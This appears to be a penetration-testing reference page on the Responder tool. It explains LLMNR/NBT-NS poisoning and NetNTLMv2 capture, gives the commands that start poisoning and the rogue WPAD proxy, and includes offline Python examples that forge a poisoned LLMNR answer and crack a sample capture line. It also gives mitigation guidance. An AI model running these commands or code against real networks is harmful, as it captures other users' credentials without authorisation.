📝 Overview

What it is: A widely used, open-source penetration testing tool written in Python, originally developed by Laurent Gaffie at SpiderLabs and now maintained by him as lgandx/Responder on GitHub. It is a Man-in-the-Middle (MitM) tool aimed at Windows networks: it sniffs for and poisons Link-Local Multicast Name Resolution (LLMNR), NetBIOS Name Service (NBT-NS) and multicast DNS (mDNS) requests, then harvests the authentication attempts that follow.
Target Phase: Exploitation (Internal Network)
Operating System: Linux (pre-installed on Kali/Parrot)

⚙️ Core Capabilities

  • Name Resolution Poisoning: Windows resolves a hostname through DNS first. Only when DNS has no answer (e.g., a user mistypes \\prnter instead of \\printer) does the client fall back to asking every host on the local link: an LLMNR query multicast to 224.0.0.252 on UDP 5355, an NBT-NS query broadcast on UDP 137, and for some clients an mDNS query to 224.0.0.251 on UDP 5353. Responder listens for those queries and, by default, answers every one of them with its own IP address; since nobody legitimately owns the name, the first answer wins and the victim connects to the attacker’s machine.
  • Rogue Authentication Servers: Responder is already listening on the ports the victim will connect to. It runs rogue SMB, HTTP/HTTPS, WPAD proxy, MSSQL, LDAP, FTP, SMTP, POP3 and IMAP servers (each can be switched on or off in Responder.conf) that take the connection just far enough to start the authentication exchange.
  • Credential Capture: What Responder captures is the NetNTLMv1 or NetNTLMv2 challenge-response that the victim sends while trying to log into the rogue server automatically, not the password and not the NT hash itself. It is written to the logs directory (on Kali, /usr/share/responder/logs/, in files such as SMB-NTLMv2-SSP-<ip>.txt) and to Responder.db in a format hashcat (-m 5500 for NetNTLMv1, -m 5600 for NetNTLMv2) and John read directly. Because the value is bound to a challenge, it cannot be reused with pass-the-hash; it is either cracked offline or, in a separate setup, the live authentication is relayed instead of captured (impacket’s ntlmrelayx with Responder’s SMB and HTTP servers turned off in Responder.conf).
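The poisoning step above, reduced to the bytes on the wire. This is an added example for this page, not Responder’s own code: it builds the LLMNR query a Windows host multicasts for a name DNS could not resolve, the poisoned answer an attacker sends back, and then parses that answer the way the victim would, all without opening a socket. Only A-record (IPv4) questions are handled, DNS label compression is not implemented, and the transaction ID, hostname, attacker IP and TTL are made up.

```python
"""LLMNR poisoning at the packet level, without touching the network.

Added example for this page; it is not Responder's own code. Only A-record
questions are handled and DNS label compression is not implemented. The
names, transaction ID, attacker IP and TTL used below are made up.
"""
import ipaddress
import struct

LLMNR_GROUP = "224.0.0.252"   # link-local multicast group, RFC 4795
LLMNR_PORT = 5355             # UDP
QTYPE_A, QCLASS_IN = 1, 1
FLAG_QR = 0x8000              # set in responses, clear in queries


def _encode_name(name: str) -> bytes:
    """DNS wire format: length-prefixed labels, terminated by a zero byte."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def _decode_name(buf: bytes, off: int):
    """Inverse of _encode_name; returns (name, offset just after the name)."""
    labels = []
    while True:
        ln = buf[off]
        off += 1
        if ln == 0:
            return ".".join(labels), off
        labels.append(buf[off:off + ln].decode("ascii"))
        off += ln


def build_query(txid: int, name: str, qtype: int = QTYPE_A) -> bytes:
    """The victim's side: a standard query (flags 0) carrying one question."""
    header = struct.pack(">6H", txid, 0, 1, 0, 0, 0)
    return header + _encode_name(name) + struct.pack(">HH", qtype, QCLASS_IN)


def parse_query(pkt: bytes):
    """What a poisoner listening on 224.0.0.252:5355 sees in each datagram."""
    txid, flags, qdcount, _, _, _ = struct.unpack(">6H", pkt[:12])
    if flags & FLAG_QR or qdcount != 1:
        return None                  # a response, or not a single-question query
    name, off = _decode_name(pkt, 12)
    qtype, qclass = struct.unpack(">HH", pkt[off:off + 4])
    return {"id": txid, "name": name, "qtype": qtype, "qclass": qclass,
            "question": pkt[12:off + 4]}


def build_poisoned_answer(query: bytes, attacker_ip: str, ttl: int = 30):
    """The attacker's side: echo the transaction ID and question, claim the name.

    Every name is answered. That is the whole trick: the victim is asking for a
    host nobody owns, so the first answer to arrive is the one it believes.
    """
    q = parse_query(query)
    if q is None or (q["qtype"], q["qclass"]) != (QTYPE_A, QCLASS_IN):
        return None
    header = struct.pack(">6H", q["id"], FLAG_QR, 1, 1, 0, 0)   # 1 question, 1 answer
    rdata = ipaddress.IPv4Address(attacker_ip).packed
    rr = _encode_name(q["name"]) + struct.pack(">HHIH", QTYPE_A, QCLASS_IN, ttl, len(rdata)) + rdata
    return header + q["question"] + rr


def parse_answer(pkt: bytes):
    """The victim's side again: (txid, name, ip) from an A-record response."""
    txid, flags, qdcount, ancount, _, _ = struct.unpack(">6H", pkt[:12])
    if not flags & FLAG_QR or ancount < 1:
        return None
    off = 12
    for _ in range(qdcount):             # skip the echoed question section
        _, off = _decode_name(pkt, off)
        off += 4
    name, off = _decode_name(pkt, off)
    rtype, rclass, _ttl, rdlen = struct.unpack(">HHIH", pkt[off:off + 10])
    off += 10
    if (rtype, rclass, rdlen) != (QTYPE_A, QCLASS_IN, 4):
        return None
    return txid, name, str(ipaddress.IPv4Address(pkt[off:off + 4]))


if __name__ == "__main__":
    # Constructed exchange: a user typed \\prnter and DNS had no record for it.
    victim_query = build_query(0x1234, "prnter")
    poison = build_poisoned_answer(victim_query, "10.10.14.5")   # made-up attacker IP
    print("victim asked for      :", parse_query(victim_query)["name"])
    print("victim now resolves to:", parse_answer(poison))
```

Responder does the same for NBT-NS (a different wire format on UDP 137) and mDNS, and it binds the multicast group on the interface given with `-I`; a real listener would receive `victim_query` from `LLMNR_GROUP:LLMNR_PORT` and unicast `poison` back to the source address.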

💻 Common Commands

| Command | Description |
|---|---|
| `sudo responder -I [interface]` | The standard way to start listening and poisoning on one network interface (e.g., `eth0` or `wlan0`). Root is needed to bind the privileged ports and the multicast sockets. |
| `sudo responder -I eth0 -wF` | Starts Responder with the rogue WPAD proxy server (`-w`); `-F` makes it demand authentication when a client fetches the wpad.dat file, so browsers and other HTTP clients that auto-detect a proxy hand over credentials too. The older `-dw` form also runs, but `-d` means different things depending on version (DHCP-response injection in Responder 3.x, answering NetBIOS domain-suffix queries in 2.x builds), so check `responder -h` before relying on it. |
| `sudo responder -I eth0 -A` | "Analyze" mode. Responder passively logs the LLMNR, NBT-NS and Browser requests it sees without answering any of them, which tells you how much poisonable traffic is on the segment and is far stealthier than poisoning. |

⚠️ Notes & Limitations

  • Layer 2 Restriction: This is the big one. LLMNR and mDNS are link-local multicast (224.0.0.252 and 224.0.0.251) and NBT-NS is a subnet broadcast; routers do not forward any of them. Your attack machine therefore has to sit in the same broadcast domain (the same subnet/VLAN) as the victims, which is why Responder is normally run from a foothold host or a dropped device on the LAN, and why the `-I` interface choice matters on a multi-homed box.
  • The Fix: Administrators defeat Responder by removing the fallback it depends on rather than by making DNS "more secure": disable LLMNR through Group Policy (Computer Configuration > Administrative Templates > Network > DNS Client > "Turn off multicast name resolution" = Enabled, which sets EnableMulticast to 0 under HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient), disable NetBIOS over TCP/IP on every adapter (via the DHCP scope option or NetbiosOptions = 2 under each HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces\Tcpip_* key), and turn off proxy auto-detection ("Automatically detect settings") so clients never go looking for a wpad host. With those off, a name DNS cannot resolve simply fails instead of being asked on the wire. Requiring SMB signing and restricting NTLM do not stop the capture but do blunt relaying. Check: after rollout, run Responder itself in analyze mode (`-A`) on the segment for a while; a correctly hardened network produces no LLMNR or NBT-NS queries at all, and any host that still sends them is misconfigured.

The reason this tool is so devastating in a corporate IT environment is Windows Single Sign-On (SSO) over NTLM.

When a user opens a file share, Windows tries to be helpful. Instead of popping up a password box, it authenticates with the logged-on user’s credentials behind the scenes: the server sends an 8-byte challenge, and the client answers with a NetNTLMv2 response computed from the NT hash of the user’s password, the challenge, and a client-supplied blob. The password and the NT hash never leave the client; only that challenge-response does.

Responder relies on Windows being too helpful. Its rogue SMB server plays the part of the file share, so the victim throws that challenge-response straight at your Kali laptop. By default Responder hands out a fixed challenge (Challenge = 1122334455667788 in Responder.conf), which is what makes precomputed-table attacks on NetNTLMv1 responses possible; NetNTLMv2 responses still have to be cracked by guessing passwords, one HMAC-MD5 chain per guess.
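To make the "captured hash" concrete, here is the NetNTLMv2 computation carried through end to end. This is an added example for this page, not Responder’s own code: it derives the NT hash, the NTLMv2 key and the NTProofStr the way a Windows client does when it silently authenticates to a rogue SMB server, writes the result in the user::DOMAIN:challenge:NTProofStr:blob line format Responder logs (the format hashcat -m 5600 reads), and then cracks such a line against a short word list. It covers the point in the Credential Capture bullet and the SSO explanation above. The user, domain, password, timestamp and client nonce are made up, and the pure-Python MD4 is only there because some OpenSSL 3 builds of Python refuse hashlib.new("md4").

```python
"""NetNTLMv2 from scratch: why a Responder "hash" is crackable but not reusable.

Added example for this page; not Responder's own code. User, domain, password,
timestamp and nonce are made up. MD4 is implemented in Python as a fallback for
interpreters whose OpenSSL build has MD4 disabled.
"""
import hashlib
import hmac
import struct

RESPONDER_DEFAULT_CHALLENGE = bytes.fromhex("1122334455667788")  # Challenge = in Responder.conf

def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF

def _md4_pure(data: bytes) -> bytes:
    """RFC 1320 MD4: three rounds of 16 steps over 64-byte little-endian blocks."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    r2 = [(i % 4) * 4 + i // 4 for i in range(16)]          # round-2 word order
    r3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]  # round-3 word order
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(48):
            if i < 16:
                f, k, s, t = (b & c) | (~b & d), i, (3, 7, 11, 19)[i % 4], 0
            elif i < 32:
                f, k, s, t = (b & c) | (b & d) | (c & d), r2[i - 16], (3, 5, 9, 13)[i % 4], 0x5A827999
            else:
                f, k, s, t = b ^ c ^ d, r3[i - 32], (3, 9, 11, 15)[i % 4], 0x6ED9EBA1
            a, b, c, d = d, _rotl((a + f + x[k] + t) & 0xFFFFFFFF, s), b, c
        h = [(u + v) & 0xFFFFFFFF for u, v in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)

def md4(data: bytes) -> bytes:
    try:
        return hashlib.new("md4", data).digest()
    except ValueError:                     # MD4 disabled in this OpenSSL build
        return _md4_pure(data)

def nt_hash(password: str) -> bytes:
    """What the DC stores and pass-the-hash reuses. Responder never sees this."""
    return md4(password.encode("utf-16le"))

def ntlmv2_key(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2 per MS-NLMP: HMAC-MD5(NT hash, UPPER(user) + domain), domain case kept."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()

def nt_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr. Bound to this challenge and this blob, so it is good for one
    authentication only and cannot be replayed against another server."""
    return hmac.new(ntlmv2_key(password, user, domain), server_challenge + blob, hashlib.md5).digest()

def make_blob(timestamp: int, client_nonce: bytes, domain: str) -> bytes:
    """Minimal NTLMv2_CLIENT_CHALLENGE: version header, FILETIME, 8-byte nonce, AV pairs."""
    av_domain = domain.encode("utf-16le")
    av_pairs = struct.pack("<HH", 2, len(av_domain)) + av_domain + struct.pack("<HH", 0, 0)
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp) + client_nonce
            + b"\x00" * 4 + av_pairs + b"\x00" * 4)

def make_capture(user: str, domain: str, password: str, blob: bytes,
                 challenge: bytes = RESPONDER_DEFAULT_CHALLENGE) -> str:
    """The line Responder writes (and hashcat -m 5600 reads) for one NTLMv2 capture."""
    proof = nt_proof(password, user, domain, challenge, blob)
    return f"{user}::{domain}:{challenge.hex()}:{proof.hex()}:{blob.hex()}"

def crack(line: str, candidates):
    """Offline attack on one captured line: recompute NTProofStr for each guess."""
    user, _, domain, chal, proof, blob = line.split(":")
    chal_b, proof_b, blob_b = bytes.fromhex(chal), bytes.fromhex(proof), bytes.fromhex(blob)
    for pw in candidates:
        if hmac.compare_digest(nt_proof(pw, user, domain, chal_b, blob_b), proof_b):
            return pw
    return None

# Constructed sample: what one SMB connection to the rogue server would yield.
SAMPLE_BLOB = make_blob(0x01DA9B0C0D0E0F10, bytes.fromhex("a1b2c3d4e5f60718"), "CORP")
SAMPLE_LINE = make_capture("jsmith", "CORP", "Winter2024!", SAMPLE_BLOB)

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("cracked:", crack(SAMPLE_LINE, ["password", "Summer2023", "Winter2024!"]))
```

Two things to notice when you run it: `SAMPLE_LINE` contains no trace of `nt_hash("Winter2024!")`, which is why the capture cannot be passed-the-hash, and changing the `challenge` argument changes the NTProofStr for the same password, which is why a capture is only ever useful for cracking (or, live, for relaying) and not for replay.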

🏷️ Tags

#Tools #Responder #MitM #LLMNR #Poisoning #Hash #Exploitation #ActiveDirectory